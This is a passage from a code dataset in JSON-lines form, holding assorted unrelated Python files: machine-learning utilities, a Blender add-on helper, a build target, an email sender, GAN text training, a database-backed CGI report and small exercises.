segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n if tokens_b:\n for token in tokens_b:\n tokens.append(token)\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n input_ids = tokenizer.convert_tokens_to_ids(tokens) # 将中文转换成ids\n # 创建mask\n input_mask = [1] * len(input_ids)\n # 对于输入进行补0\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_mask.append(0)\n segment_ids.append(0)\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n return input_ids, input_mask, segment_ids # 对应的就是创建bert模型时候的input_ids,input_mask,segment_ids 参数\n","sub_path":"英文垃圾信息分类/src/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"647047319","text":"import bpy\n\n\ndef object_prepare():\n\tops_ob = bpy.ops.object\n\tops_ob.make_single_user(object=True, obdata=True)\n\tops_ob.convert(target=\"MESH\")\n\n\ndef mesh_selection(ob, select_action):\n\tcontext = bpy.context\n\tsce = context.scene\n\tobj = context.active_object\n\tops = bpy.ops\n\tops_me = bpy.ops.mesh\n\tops_ob = ops.object\n\n\n\tdef mesh_cleanup():\n\t\tops_me.select_all(action=\"SELECT\")\n\t\tops_me.delete_loose()\n\t\tops_me.select_all(action=\"SELECT\")\n\t\tops_me.remove_doubles(threshold=0.0001)\n\t\tops_me.fill_holes(sides=0)\n\t\tops_me.normals_make_consistent()\n\n\n\tsce.objects.active = ob\n\tops_ob.mode_set(mode=\"EDIT\")\n\n\tmesh_cleanup()\n\tops_me.select_all(action=select_action)\n\n\tops_ob.mode_set(mode=\"OBJECT\")\n\tsce.objects.active = obj\n\n\ndef modifier_boolean(obj, ob, mode):\n\tmd = obj.modifiers.new('Booltron', 'BOOLEAN')\n\tmd.show_viewport = False\n\tmd.show_render = False\n\tmd.operation = mode\n\tmd.object = ob\n\n\tbpy.ops.object.modifier_apply(modifier=\"Booltron\")\n\tbpy.context.scene.objects.unlink(ob)\n\tbpy.data.objects.remove(ob)\n\n\ndef boolean_optimized(mode):\n\tcontext = bpy.context\n\tobj = context.active_object\n\n\tobject_prepare()\n\n\tobj.select = False\n\tobs = context.selected_objects\n\tob = obs[0]\n\n\tif len(obs) != 1:\n\t\tcontext.scene.objects.active = ob\n\t\tbpy.ops.object.join()\n\t\tcontext.scene.objects.active = obj\n\n\tmesh_selection(obj, 'DESELECT')\n\tmesh_selection(ob, 'SELECT')\n\tmodifier_boolean(obj, ob, mode)\n\tobj.select = True\n\n\ndef boolean_each(mode):\n\tcontext = bpy.context\n\tobj = context.active_object\n\n\tobject_prepare()\n\n\tobj.select = False\n\tobs = context.selected_objects\n\n\tmesh_selection(obj, 'DESELECT')\n\tfor ob in obs:\n\t\tmesh_selection(ob, 'SELECT')\n\t\tmodifier_boolean(obj, ob, mode)\n\tobj.select = True\n\n\n\n\n\n\ndef union():\n\tcontext = bpy.context\n\tmode = 'UNION'\n\n\n\tdef separate():\n\t\tops = bpy.ops\n\t\tops_ob = ops.object\n\t\tops_ob.mode_set(mode=\"EDIT\")\n\t\tops.mesh.separate(type=\"LOOSE\")\n\t\tops_ob.mode_set(mode=\"OBJECT\")\n\n\n\tboolean_optimized(mode)\n\tseparate()\n\tif len(context.selected_objects) != 1:\n\t\tboolean_each(mode)\n\n\ndef intersect():\n\tmode = 'INTERSECT'\n\tboolean_each(mode)\n\n\ndef difference():\n\tmode = 'DIFFERENCE'\n\tboolean_optimized(mode)\n\n\ndef separate():\n\tcontext = bpy.context\n\tsce = context.scene\n\tobj = context.active_object\n\n\n\tdef object_duplicate(ob):\n\t\tops_ob = bpy.ops.object\n\t\tops_ob.select_all(action=\"DESELECT\")\n\t\tops_ob.select_pattern(pattern=ob.name)\n\t\tops_ob.duplicate()\n\t\treturn context.selected_objects[0]\n\n\n\tobject_prepare()\n\n\tobj.select = False\n\tob = context.selected_objects[0]\n\n\tobj_copy = object_duplicate(obj)\n\tob_copy = object_duplicate(ob)\n\n\tmode = 'INTERSECT'\n\tmesh_selection(obj_copy, 'SELECT')\n\tmesh_selection(ob, 'DESELECT')\n\tsce.objects.active = ob\n\tmodifier_boolean(ob, obj_copy, mode)\n\n\tmode = 'DIFFERENCE'\n\tmesh_selection(ob_copy, 'SELECT')\n\tmesh_selection(obj, 'DESELECT')\n\tsce.objects.active = obj\n\tmodifier_boolean(obj, ob_copy, mode)\n\tobj.select = True\n","sub_path":"scripts/addons_extern/blender-addon-booltron-master/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"26439748","text":"import numpy as np\n\nclass StackingFeature(object):\n\tdef __init__(self):\n\t\tpass\n\n\tdef concatArray(self,train,test,train_joint_array,test_joint_array):\n\t\ttemp_train_jointed_array = train_joint_array.reshape(1,len(train_joint_array))\n\t\ttemp_test_jointed_array = test_joint_array.reshape(1,len(test_joint_array))\n\t\tresult_train = np.hstack((train,temp_train_jointed_array))\n\t\tresult_test = np.hstack((test,temp_test_jointed_array))\n\t\treturn result_train,result_test\n\n\tdef mean(self,train,test):\n\t\ttrain_joint_array = np.mean(train,axis=1)\n\t\ttest_joint_array = np.mean(test,axis=1)\n\t\treturn self.concatArray(train, test, train_joint_array, test_joint_array)\n\n\tdef std(self,train,test):\n\t\ttrain_joint_array = np.std(train,axis=1)\n\t\ttest_joint_array = np.std(test,axis=1)\n\t\treturn self.concatArray(train, test, train_joint_array, test_joint_array)\n\n\tdef convert(self,train,test,mean_flag=True,std_flag=True,tsne_flag=True):\n\t\ttrain_array = train\n\t\ttest_array = test\n\t\t\n\t\tif mean_flag:\n\t\t\ttrain_array,test_array = self.mean(train, test)\n\n\t\tif std_flag:\n\t\t\ttrain_array,test_array = self.std(train, test)\n\n\t\treturn train_array,test_array","sub_path":"sample/StackingFeature.py","file_name":"StackingFeature.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"102598010","text":"# coding=utf-8\n# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport logging\n\nfrom pants.backend.jvm.targets.exportable_jvm_library import ExportableJvmLibrary\nfrom pants.base.payload import Payload\nfrom pants.base.payload_field import PrimitiveField\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass JavaWireLibrary(ExportableJvmLibrary):\n \"\"\"Generates a stub Java library from protobuf IDL files.\"\"\"\n\n def __init__(self,\n payload=None,\n service_writer=None,\n service_writer_options=None,\n roots=None,\n registry_class=None,\n enum_options=None,\n no_options=None,\n **kwargs):\n \"\"\"\n :param string service_writer: the name of the class to pass as the --service_writer option to\n the Wire compiler.\n :param list service_writer_options: A list of options to pass to the service writer\n :param list roots: passed through to the --roots option of the Wire compiler\n :param string registry_class: fully qualified class name of RegistryClass to create. If in\n doubt, specify com.squareup.wire.SimpleServiceWriter\n :param list enum_options: list of enums to pass to as the --enum-enum_options option, # optional\n :param boolean no_options: boolean that determines if --no_options flag is passed\n \"\"\"\n payload = payload or Payload()\n payload.add_fields({\n 'service_writer': PrimitiveField(service_writer or None),\n 'service_writer_options': PrimitiveField(service_writer_options or []),\n 'roots': PrimitiveField(roots or []),\n 'registry_class': PrimitiveField(registry_class or None),\n 'enum_options': PrimitiveField(enum_options or []),\n 'no_options': PrimitiveField(no_options or False),\n })\n\n if service_writer_options:\n logger.warn('The service_writer_options flag is ignored.')\n\n super(JavaWireLibrary, self).__init__(payload=payload, **kwargs)\n self.add_labels('codegen')\n","sub_path":"src/python/pants/backend/codegen/targets/java_wire_library.py","file_name":"java_wire_library.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"530491596","text":"import os\r\nimport logging\r\nimport wrapt\r\n\r\n@wrapt.decorator\r\ndef log_args(wrapped, instance, args, kwargs):\r\n log = logging.getLogger() # root logger\r\n log.setLevel(logging.INFO)\r\n return wrapped(*args, **kwargs)\r\n\r\nclass Apihelper:\r\n\r\n def __init__(self):\r\n\r\n with open(os.getcwd() + \"\\\\data.txt\", mode='w') as f:\r\n # print('header')\r\n f.write(\"Name\")\r\n f.write(\",\")\r\n f.write(\"Height\")\r\n f.write(\",\")\r\n f.write(\"Gender\")\r\n f.write(\"\\n\")\r\n\r\n @log_args\r\n def star_wars_characters(self, page_nr):\r\n page_character_list=[]\r\n for character in page_nr['results']:\r\n name_hgt_gen = character['name']+','+character['height']+','+character['gender']\r\n page_character_list.append(name_hgt_gen)\r\n\r\n return (page_character_list)\r\n\r\n\r\n def append_to_file(self, filepath,name,height,gender):\r\n with open(filepath, \"a\")as f:\r\n f.write(\",\".join([name,height,gender]))\r\n f.write(\"\\n\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"apihelper.py","file_name":"apihelper.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"69995191","text":"import os\nfrom setuptools import find_packages, setup\n\nhere = os.path.dirname(os.path.abspath(__file__))\n\nversion_ns = {}\nwith open(os.path.join(here, 'sml_sync', 'version.py')) as f:\n exec(f.read(), {}, version_ns)\n\nsetup(\n name='sml_sync',\n version=version_ns['version'],\n description='SherlockML file synchronizer',\n author='ASI Data Science',\n packages=find_packages(),\n entry_points={\n 'console_scripts': ['sml-sync=sml_sync:run']\n },\n install_requires=[\n 'sml',\n 'daiquiri',\n 'paramiko',\n 'watchdog',\n 'semantic_version',\n 'prompt_toolkit>=2.0'\n ],\n classifiers=[\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"25330452","text":"import sib_api_v3_sdk as sib_sdk\nfrom sib_api_v3_sdk.rest import ApiException\n\nfrom .deps import smtp\n\n\ndef send_new_message_email(from_email, from_name, to_email, to_name, link):\n mail = sib_sdk.SendSmtpEmail(\n sender={\"name\": \"Studio Rubik\", \"email\": \"noreply@studio-rubik.dev\"},\n to=[{\"name\": to_name, \"email\": to_email}],\n template_id=2,\n params={\"from_name\": from_name, \"to_name\": to_name, \"link\": link},\n )\n try:\n smtp.send_transac_email(mail)\n except ApiException as e:\n print(e)\n","sub_path":"api/src/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"534485940","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import Model\ntfkl = tf.keras.layers\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot') # Change the style of the plots to a nicer theme\nimport random\nimport time\n# From IPython.display we import clear_output() in order to be able to clear the print statements after each epoch\nfrom IPython.display import clear_output\nfrom tqdm import tqdm, tqdm_notebook # Show progress bar\nimport gensim\n\n\n\ndef timing(start):\n \"\"\"Function to time the duration of each epoch\n\n Arguments:\n start (time): Start time needed for computation \n \n Returns:\n time_per_training_step (time): Rounded time in seconds \n \"\"\"\n now = time.time()\n time_per_training_step = now - start\n return round(time_per_training_step, 4)\n\n\n\ndef discriminator_loss(real_tweet, fake_tweet):\n \"\"\"Calculate the Wasserstein loss for the discriminator but swapping the sign in order to apply gradient descent.\n\n Arguments:\n real_tweet (tensor): Linear output from discriminator\n fake_tweet (tensor): Linear output from discriminator\n\n Returns:\n x (tensor): Wasserstein Loss\n \"\"\"\n\n loss_real = - tf.reduce_mean(real_tweet)\n loss_fake = tf.reduce_mean(fake_tweet)\n\n return loss_real + loss_fake\n\n\n\ndef generator_loss(fake_tweet):\n \"\"\"Calculate the Wasserstein loss for the generator.\n\n Arguments:\n fake_tweet (tensor): Linear output from discriminator\n\n Returns:\n x (tensor): Wasserstein Loss\n \"\"\"\n\n loss_fake = - tf.reduce_mean(fake_tweet)\n\n return loss_fake\n \n \n \n@tf.function() \ndef gradient_penalty(discriminator, real_tweet, generated_tweet):\n \"\"\"Visualize performance of the Generator by feeding predefined random noise vectors through it.\n \n Arguments:\n discriminator (Discriminator): Discriminator class instance\n real_tweet (tensor): Real tweet embedding from Encoder\n generated_tweet (tensor): Fake tweet embedding from Generator\n\n Return: \n penalty (): Gradient penalty that will be added to discriminator loss\n \"\"\" \n\n # Due to the stacked approach we chose for the Autoencoder we had to alter the gradient\n # penalty by interpolating twice and calculating an average penalty. \n alpha = tf.random.uniform(shape=[real_tweet.shape[0], 1], minval=0, maxval=1)\n\n interpolate = alpha*real_tweet + (1-alpha)*generated_tweet\n\n output = discriminator(interpolate)\n\n gradients = tf.gradients(output, interpolate)\n\n gradient_norm = tf.sqrt(tf.reduce_sum(tf.square(gradients)))\n\n penalty = 10*tf.reduce_mean((gradient_norm-1.)**2)\n\n return penalty\n\n\n\ndef visualize_GAN(autoencoder, word2vec_model, fixed_input, random_input, train_losses_generator, train_losses_discriminator, num_epochs):\n \"\"\"Visualize performance of the Generator by feeding predefined random noise vectors through it.\n \n Arguments:\n autoencoder (AutoEncoder): AutoEncoder class instance\n word2vec_model (gensim.models.word2vec.Word2Vec): Pretrained word2vec model\n fixed_input (tensor): List containing predefined random vectors\n random_input (tensor): List containing predefined random vectors\n train_losses_generator (list): List containing the generator losses\n train_losses_discriminator (list): List containing the discriminator losses \n num_epochs (int): Current Epoch\n \"\"\" \n\n print()\n print(f\"From Fixed Vector: {' '.join([word2vec_model.wv.index2word[i.numpy()[0] -1] for i in autoencoder.Decoder.inference_mode(states=fixed_input[0], training=False) if i.numpy()[0] != 0])}\")\n print(f\"From Fixed Vector: {' '.join([word2vec_model.wv.index2word[i.numpy()[0] -1] for i in autoencoder.Decoder.inference_mode(states=fixed_input[1], training=False) if i.numpy()[0] != 0])}\")\n print()\n print(f\"From Random Vector: {' '.join([word2vec_model.wv.index2word[i.numpy()[0] -1] for i in autoencoder.Decoder.inference_mode(states=random_input[0], training=False) if i.numpy()[0] != 0])}\")\n print(f\"From Random Vector: {' '.join([word2vec_model.wv.index2word[i.numpy()[0] -1] for i in autoencoder.Decoder.inference_mode(states=random_input[1], training=False) if i.numpy()[0] != 0])}\")\n\n plt.style.use('ggplot')\n \n fig1, ax1 = plt.subplots(nrows=1, ncols=1, figsize = (10, 6))\n ax1.plot(train_losses_generator, label='Generator')\n ax1.plot(train_losses_discriminator, label='Discriminator')\n ax1.set(ylabel='Loss', xlabel='Epochs', title=f'Average loss over {num_epochs} epochs')\n if num_epochs>25 and num_epochs<=50:\n ax1.set_ylim([-10,100])\n if num_epochs>50:\n ax1.set_ylim([-5,25])\n ax1.legend()\n \n plt.show()\n\n\n\n@tf.function() \ndef train_step_GAN(generator, discriminator, train_data, optimizer_generator, optimizer_discriminator, train_generator):\n \"\"\"Perform a training step for a given GAN Network by\n 1. Generating random noise for the Generator\n 2. Feeding the noise through the Generator to create fake tweet embeddings for the Discriminator \n 3. Feeding the fake and real tweet embeddings through the Discriminator \n 4. Calculating the loss for the Disriminator and the Generator \n 5. Performing Backpropagation and Updating the trainable variables with the calculated gradients, using the specified optimizers\n\n Arguments:\n generator (Generator): Generator class instance\n discriminator (Discriminator): Discriminator class instance\n word2vec_model (gensim.models.word2vec.Word2Vec): Pretrained word2vec model\n train_data (tf.data.Dataset): Real tweet embedding from Encoder\n optimizer_generator (tf.keras.optimizers): function from keras defining the to be applied optimizer during training\n optimizer_discriminator (tf.keras.optimizers): function from keras defining the to be applied optimizer during training\n train_generator (bool): Whether to update the generator or not\n \n Returns:\n loss_from_generator, loss_from_discriminator (Tupel): Tupel containing the loss of both the Generator and Discriminator\n \"\"\"\n\n # 1.\n noise = tf.random.normal([train_data.shape[0], 100])\n\n # Two Gradient Tapes, one for the Discriminator and one for the Generator \n with tf.GradientTape() as generator_tape, tf.GradientTape() as discriminator_tape:\n # 2.\n generated_tweet = generator(noise)\n\n # 3.\n real = discriminator(train_data)\n fake = discriminator(generated_tweet)\n\n # 4.\n loss_from_generator = generator_loss(fake)\n # Add gradient penalty to enforce lipschitz continuity\n loss_from_discriminator = discriminator_loss(real, fake) + gradient_penalty(discriminator=discriminator, real_tweet=train_data, generated_tweet=generated_tweet)\n\n # 5.\n gradients_from_discriminator = discriminator_tape.gradient(loss_from_discriminator, discriminator.trainable_variables)\n optimizer_discriminator.apply_gradients(zip(gradients_from_discriminator, discriminator.trainable_variables))\n\n # We update the generator once for ten updates to the discriminator\n if train_generator:\n gradients_from_generator = generator_tape.gradient(loss_from_generator, generator.trainable_variables)\n optimizer_generator.apply_gradients(zip(gradients_from_generator, generator.trainable_variables))\n\n return loss_from_generator, loss_from_discriminator\n \n\n\ndef train_GAN(generator, discriminator, autoencoder, word2vec_model: gensim.models.word2vec.Word2Vec, train_dataset_GAN: tf.data.Dataset, num_epochs: int=150, running_average_factor: float=0.95, learning_rate: float=0.0001):\n \"\"\"Function that implements the training algorithm for a GAN.\n\n Arguments:\n generator (Generator): Generator class instance\n discriminator (Discriminator): Discriminator class instance\n autoencoder (AutoEncoder): AutoEncoder class instance\n word2vec_model (gensim.models.word2vec.Word2Vec): Pretrained word2vec model\n train_dataset_GAN (tf.data.Dataset): Dataset to perform training on\n num_epochs (int): Defines the amount of epochs the training is performed\n learning_rate (float): To be used learning rate, per default set to 0.001\n running_average (float): To be used factor for computing the running average of the trainings loss, per default set to 0.95\n \"\"\" \n\n tf.keras.backend.clear_session()\n\n # Two optimizers one for the generator and of for the discriminator\n optimizer_generator=tf.keras.optimizers.Adam(learning_rate=learning_rate)\n optimizer_discriminator=tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n # Fixed, random vectors for visualization\n fixed_generator_input_1 = tf.random.normal([1, 100])\n fixed_generator_input_2 = tf.random.normal([1, 100])\n\n # Initialize lists for later visualization.\n train_losses_generator = []\n train_losses_discriminator = []\n\n train_generator = False\n\n for epoch in range(num_epochs):\n\n start = time.time()\n running_average_gen = 0\n running_average_disc = 0\n\n with tqdm(total=519) as pbar:\n for batch_no, input in enumerate(train_dataset_GAN):\n\n # Boolean used to train the discriminator 10x more often than the generator\n train_generator = False\n if batch_no % 10 == 0:\n train_generator = True\n\n gen_loss, disc_loss = train_step_GAN(generator, discriminator, train_data=input, optimizer_generator=optimizer_generator, optimizer_discriminator=optimizer_discriminator, train_generator=train_generator)\n running_average_gen = running_average_factor * running_average_gen + (1 - running_average_factor) * gen_loss\n running_average_disc = running_average_factor * running_average_disc + (1 - running_average_factor) * disc_loss\n pbar.update(1)\n\n train_losses_generator.append(float(running_average_gen))\n train_losses_discriminator.append(float(running_average_disc))\n\n clear_output()\n print(f'Epoch: {epoch+1}') \n print()\n print(f'This epoch took {timing(start)} seconds')\n print()\n print(f'The current generator loss: {round(train_losses_generator[-1], 4)}')\n print()\n print(f'The current discriminator loss: {round(train_losses_discriminator[-1], 4)}')\n print()\n\n # Random vectors for visualization that are sampled each epoch\n random_generator_input_1 = tf.random.normal([1, 100])\n random_generator_input_2 = tf.random.normal([1, 100])\n \n visualize_GAN(autoencoder=autoencoder,\n word2vec_model=word2vec_model,\n fixed_input=(generator(fixed_generator_input_1), generator(fixed_generator_input_2)), \n random_input=(generator(random_generator_input_1), generator(random_generator_input_2)), \n train_losses_generator=train_losses_generator, \n train_losses_discriminator=train_losses_discriminator, \n num_epochs=epoch+1)","sub_path":"Modules/standard_latextgan_training.py","file_name":"standard_latextgan_training.py","file_ext":"py","file_size_in_byte":10625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"239513501","text":"import os, requests\nimport datetime\n\nfrom toaster.helper import get_config_path, load_default_id, format_time\n\nwebhook_url = load_default_id()\n\ndef toast(method):\n if webhook_url == '':\n raise UnboundLocalError('You have not configured your Telegram ID. Run set_incoming_webhook() first.')\n\n def insert_toast(*args, **kw):\n try:\n start = datetime.datetime.now()\n result = method(*args, **kw)\n end = datetime.datetime.now()\n diff = end - start\n # Create Message\n msg = \"🍞 Ding! Function {} has completed!\\nStart Time: {}\\nEnd Time: {}\\nTime Taken: {}\".format(\n method.__name__, start.strftime(\"%Y-%m-%d %H:%M:%S\"), end.strftime(\"%Y-%m-%d %H:%M:%S\"), format_time(diff)\n )\n data = {\n 'text':msg\n }\n\n res = requests.post(url = WEBHOOK_URL, data = data, headers={'Content-Type': \"application/json\"})\n return result\n\n except Exception as e:\n msg = '⚠️ An error has occurred with function {}\\nError message: {}'.format(method.__name__, str(e))\n print('Error caught:',e)\n data = {\n 'text':msg\n }\n # Send Telegram Message\n res = requests.post(url = WEBHOOK_URL, data = data, headers={'Content-Type': \"application/json\"})\n\n return insert_toast\n\ndef set_incoming_webhook(webhook_url):\n webhook_url = str(webhook_url)\n config_path = get_config_path()\n with open(config_path,\"w\") as config_file:\n config_file.write(webhook_url)\n global WEBHOOK_URL\n WEBHOOK_URL = webhook_url\n","sub_path":"toaster/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"72896712","text":"# coding=utf-8\nimport unittest\nfrom models.AcousticModel import AcousticModel\nimport util.dataprocessor as dataprocessor\nimport tensorflow as tf\n\n\nclass TestAcousticModel(unittest.TestCase):\n model = None\n sess = None\n\n @classmethod\n def setUpClass(cls):\n with tf.Session() as sess:\n cls.model = AcousticModel(sess, 2, 50, 0.8, 0.5, 3, 0.0003, 0.33, 5, 1800, 600, 120, False,\n forward_only=False, tensorboard_dir=None, tb_run_name=None,\n timeline_enabled=False, language='english')\n\n def test_get_str_labels_and_reverse(self):\n text = \"What ! I'm not looking for... I'll do it...\"\n cleaned_str = dataprocessor.DataProcessor.clean_label(text)\n numeric_label = self.model.get_str_labels(cleaned_str)\n new_text = self.model.get_labels_str(numeric_label)\n self.assertEqual(new_text, cleaned_str)\n\n def test_3_chars_token_in_str_end(self):\n text = \"it'll\"\n cleaned_str = dataprocessor.DataProcessor.clean_label(text)\n numeric_label = self.model.get_str_labels(cleaned_str)\n self.assertEqual(numeric_label, [60, 45, 1, 79])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"models/test_AcousticModel.py","file_name":"test_AcousticModel.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"470752609","text":"#!../.venv3/bin/python\n# coding: utf-8\n\n# # List of users report\n\n# ### Imports\n\n# In[1]:\n\n\nimport sys\nimport psycopg2\nimport pandas as pd\nfrom datetime import datetime\n\n\n# ### Initial setup\n\n# In[2]:\n\n\nconn = psycopg2.connect(host='localhost',\n port='5432',\n user='mffais',\n password='pass',\n database='bigquery')\n\n\n# ### Fetch users\n\n# In[3]:\n\n\ncursor = conn.cursor()\nquery = '''\n SELECT user_pseudo_id AS user_id,\n geo ->> 'country' AS country,\n traffic_source ->> 'source' AS source,\n traffic_source ->> 'name' AS campaign,\n DATE(user_first_touch_timestamp) AS install_date\n FROM events\n WHERE geo ->> 'country' <> ''\n AND user_first_touch_timestamp IS NOT NULL\n GROUP BY user_pseudo_id, country, source, campaign, user_first_touch_timestamp\n ORDER BY country\n'''\ncursor.execute(query)\nlist_of_users = pd.read_sql(query, con=conn)\ncursor.close()\nlist_of_users.rename(columns={ 'user_id':'User ID',\n 'country':'Country',\n 'source':'Source',\n 'campaign':'Campaign',\n 'install_date':'Install date'}, inplace=True)\nlist_of_users.head(20)\n\n\n# ### Calculate uninstalls\n\n# In[4]:\n\n\ncursor = conn.cursor()\nquery = '''\n SELECT user_pseudo_id AS user_id,\n DATE(event_timestamp) AS uninstall_date\n FROM events\n WHERE event_name='app_remove'\n'''\ncursor.execute(query)\nuninstall = pd.read_sql(query, con=conn)\ncursor.close()\nuninstall.rename(columns={ 'user_id':'User ID', 'uninstall_date':'Uninstall date' }, inplace=True)\nuninstall.head(20)\n\n\n# ### Calculate days installed\n\n# In[5]:\n\n\nlist_of_users = pd.merge(list_of_users, uninstall, on='User ID', how='left')\nlist_of_users.head(20)\n\n\n# In[6]:\n\n\ntoday = datetime.date( datetime.now() )\n\ndef cleanNaN(row):\n uninstall_date = row['Uninstall date']\n if str( uninstall_date ) == 'nan':\n return ''\n return uninstall_date\n\ndef date_diff(row):\n install_date = row['Install date']\n if str( row['Uninstall date'] ) == '':\n used_date = today\n else:\n used_date = row['Uninstall date']\n days_installed = int( int( ( used_date - install_date ).total_seconds() ) / 24 / 60 / 60 + 1 )\n return days_installed\n\nlist_of_users['Uninstall date'] = list_of_users.apply(cleanNaN, axis=1)\nlist_of_users['Days installed'] = list_of_users.apply(date_diff, axis=1)\n\nlist_of_users.head(20)\n\n\n# ### Calculate sessions since installed\n\n# In[7]:\n\n\ncursor = conn.cursor()\nquery = '''\n SELECT user_pseudo_id AS user_id,\n COUNT(*) AS sessions\n FROM (\n SELECT event_date,\n user_pseudo_id\n FROM events\n GROUP BY event_date, user_pseudo_id\n ) AS users_by_day\n GROUP BY user_id\n'''\ncursor.execute(query)\nsessions = pd.read_sql(query, con=conn)\nsessions.rename(columns={ 'user_id':'User ID', 'sessions':'Sessions' }, inplace=True)\nsessions.head(20)\n\n\n# In[8]:\n\n\nlist_of_users = pd.merge(list_of_users, sessions, on='User ID', how='left')\nlist_of_users.head(20)\n\n\n# ### Output HTTP Header\n\n# In[9]:\n\n\nprint('Content-type: text/csv')\nprint('Content-Disposition: attachment; filename=\"list_of_users.csv\"')\nprint()\n\n\n# ### Output variables\n\n# In[10]:\n\n\nprint('# Title: List of users report')\n\n\n# ### Ouput result\n\n# In[11]:\n\n\nstr = list_of_users.to_csv(index=False)\nprint(str.encode('ascii','xmlcharrefreplace').decode('utf-8'))\n\n\n# ### Release resources\n\n# In[12]:\n\n\nconn.close()\n\n","sub_path":"cgi/report_list_of_users.py","file_name":"report_list_of_users.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"197308366","text":"n = int(input())\r\ncoins = input().split()\r\ncoins = list(map(int,coins))\r\ncoins.sort(reverse=True)\r\nsum = sum(coins)\r\nm_sum = 0\r\nc = 0\r\nfor i in range(n):\r\n if m_sum <= sum - m_sum :\r\n m_sum +=coins[i]\r\n c+=1\r\n else:\r\n break\r\nprint(c)","sub_path":"python/160A.py","file_name":"160A.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"57784317","text":"# To support both python 2 and python 3\nfrom __future__ import division, print_function, unicode_literals\nfrom datetime import datetime\nimport os.path\n\nimport tensorflow as tf\nimport numpy as np\n\nhe_init = tf.contrib.layers.variance_scaling_initializer()\nlearning_rate=0.01\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"datasets/\")\nX_train1 = mnist.train.images\ny_train1 = mnist.train.labels\n\nX_train2 = mnist.validation.images\ny_train2 = mnist.validation.labels\n\nX_test = mnist.test.images\ny_test = mnist.test.labels\n\n\ndef leaky_relu(alpha=0.01):\n def parametrized_leaky_relu(z, name=None):\n return tf.maximum(alpha * z, z, name=name)\n\n return parametrized_leaky_relu\n\ndef log_dir(prefix=\"\"):\n now = datetime.utcnow().strftime(\"%Y%m%d%H%M%S\")\n root_logdir = \"tf_logs\"\n if prefix:\n prefix += \"-\"\n name = prefix + \"run-\" + now\n return \"{}/{}/\".format(root_logdir, name)\n\ndef build_dnn(inputs, scope_name, training, n_hidden_layers=5, n_neurons=100, dropout_rate=0, initializer = he_init, activation =leaky_relu()):\n with tf.variable_scope(scope_name, \"dnn\"):\n\n inputs = tf.layers.dropout(inputs, dropout_rate, training=training)\n\n for i in range(n_hidden_layers):\n inputs = tf.layers.dense(inputs, n_neurons, kernel_initializer = initializer, name=\"layer\"+str(i))\n inputs = activation(inputs)\n inputs = tf.layers.dropout(inputs, dropout_rate, training=training)\n\n return inputs\n\ndef build_graph(n_inputs, n_outputs):\n X = tf.placeholder(tf.float32, shape=(None, 2, n_inputs), name=\"X\")\n y = tf.placeholder(tf.int32, shape=(None), name=\"y\")\n\n X1, X2 = tf.unstack(X, axis=1)\n\n training = tf.placeholder_with_default(False, shape=(), name='training')\n\n dnn_outputs1 = build_dnn(X1, \"DNN_A\", training)\n dnn_outputs2 = build_dnn(X2, \"DNN_B\", training)\n\n dnn_outputs = tf.concat([dnn_outputs1, dnn_outputs2], axis =1)\n hidden_layer = tf.layers.dense(dnn_outputs, units=10, activation=leaky_relu(), kernel_initializer = he_init, name=\"hidden_summary\")\n logits = tf.layers.dense(hidden_layer, units=1, kernel_initializer=he_init, name=\"logits\")\n\n y_proba = tf.nn.sigmoid(logits)\n y_pred = tf.cast(tf.greater_equal(logits, 0), tf.int32)\n\n y_as_float = tf.cast(y, tf.float32)\n xentropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_as_float, logits=logits)\n loss = tf.reduce_mean(xentropy)\n\n optimiser = tf.train.AdamOptimizer(learning_rate=learning_rate)\n training_op = optimiser.minimize(loss)\n\n y_pred_correct = tf.equal(y_pred, y)\n accuracy = tf.reduce_mean(tf.cast(y_pred_correct, 